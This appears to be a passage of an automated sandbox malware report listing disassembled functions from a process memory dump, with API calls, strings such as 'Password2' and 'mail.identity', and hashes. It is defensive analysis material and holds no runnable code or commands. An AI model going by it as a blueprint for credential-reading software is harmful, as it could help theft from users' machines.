Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48

Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00407127
GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
_strcmpi.MSVCRT ref: 0040714C

Strings

edit, xrefs: 00407146

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ClassName_strcmpimemset
String ID: edit
API String ID: 275601554-2167791130
Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95

Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 004075A0
strlen.MSVCRT ref: 004075AB
_mbscat.MSVCRT ref: 004075C2

Strings

3CD, xrefs: 004075BB

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$_mbscat
String ID: 3CD
API String ID: 3951308622-1938365332
Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D

Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT(0045AC18,?), ref: 00443C4F
_mbscat.MSVCRT ref: 00443C5A
_mbscat.MSVCRT ref: 00443C65

Strings

Password2, xrefs: 00443C5F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscat$_mbscpy
String ID: Password2
API String ID: 2600922555-1856559283
Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF

Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31

Strings

SHGetSpecialFolderPathA, xrefs: 00410D2B
shell32.dll, xrefs: 00410D17

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SHGetSpecialFolderPathA$shell32.dll
API String ID: 2574300362-543337301
Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D

Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004326E4
memset.MSVCRT ref: 0043279A
memset.MSVCRT ref: 00432967

Strings

rows deleted, xrefs: 00432BB3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: rows deleted
API String ID: 2221118986-571615504
Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4

Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memcmp
String ID:
API String ID: 3384217055-0
Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765

Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1

??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@$memset
String ID:
API String ID: 1860491036-0
Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19

Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004048C2
memset.MSVCRT ref: 004048D6
memset.MSVCRT ref: 004048EA
memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64

Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D2C2
memset.MSVCRT ref: 0040D2D8
memset.MSVCRT ref: 0040D2EA
memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
memset.MSVCRT ref: 0040D319

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D

Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00425850
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
__allrem.LIBCMT ref: 00425933
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19

Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042C691

Strings

variable number must be between ?1 and ?%d, xrefs: 0042C5C2
too many SQL variables, xrefs: 0042C6FD

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset
String ID: too many SQL variables$variable number must be between ?1 and ?%d
API String ID: 2221118986-515162456
Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88

Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E

Strings

CREATE TABLE , xrefs: 0042FFEA
, , xrefs: 0042FFAF
, xrefs: 0042FFA8

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: $, $CREATE TABLE
API String ID: 3510742995-3459038510
Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98

Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
memset.MSVCRT ref: 004026AD

Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
LocalFree.KERNEL32(?), ref: 004027A6

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
String ID:
API String ID: 3503910906-0
Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A

Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C922
SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Message$MenuPostSendStringmemset
String ID:
API String ID: 3798638045-0
Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8

Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5

strlen.MSVCRT ref: 0040B60B
atoi.MSVCRT(?), ref: 0040B619
_mbsicmp.MSVCRT ref: 0040B66C
_mbsicmp.MSVCRT ref: 0040B67F

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbsicmp$??2@??3@atoistrlen
String ID:
API String ID: 4107816708-0
Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99

Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
_gmtime64.MSVCRT ref: 00411437
memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
strftime.MSVCRT ref: 00411476

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
String ID:
API String ID: 1886415126-0
Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699

Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0044446F

Strings

>, xrefs: 00444495
>, xrefs: 004444AA
>, xrefs: 004444D0

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strlen
String ID: >$>$>
API String ID: 39653677-3911187716
Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA

Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296

Strings

@, xrefs: 0040D284

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy
String ID: @
API String ID: 3510742995-2766056989
Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8

Function 00407FA4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FD9
memset.MSVCRT ref: 00407FEA
memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
??3@YAXPAX@Z.MSVCRT ref: 00408003

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: d43597cadd8799b6ce799edf9af806d1227b00376f30c5f12f51dca381150f40
Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
Opcode Fuzzy Hash: d43597cadd8799b6ce799edf9af806d1227b00376f30c5f12f51dca381150f40
Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64

Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON

Download Yara Rule

APIs

_strcmpi.MSVCRT ref: 0040E1F9
_strcmpi.MSVCRT ref: 0040E20E

Strings

mail.identity, xrefs: 0040E1D2
C@, xrefs: 0040E22E, 0040E1ED

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _strcmpi
String ID: C@$mail.identity
API String ID: 1439213657-721921413
Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98

Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00410F20
SHBrowseForFolder.SHELL32(?), ref: 00410F52
SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
_mbscpy.MSVCRT(?,?), ref: 00410F79

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: BrowseFolderFromListMallocPath_mbscpy
String ID:
API String ID: 1479990042-0
Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64

Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406640

Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475

memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695

Strings

Ul@, xrefs: 00406620

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memset$memcmp
String ID: Ul@
API String ID: 270934217-715280498
Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5

Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE

sprintf.MSVCRT ref: 0040B929
SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C

Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F

sprintf.MSVCRT ref: 0040B953
_mbscat.MSVCRT ref: 0040B966

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
String ID:
API String ID: 203655857-0
Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59

Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040ADE8
memset.MSVCRT ref: 0040ADFE

Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E

sprintf.MSVCRT ref: 0040AE28

Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D

Strings

</%s>, xrefs: 0040AE22

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
String ID: </%s>
API String ID: 3699762281-259020660
Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5

Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

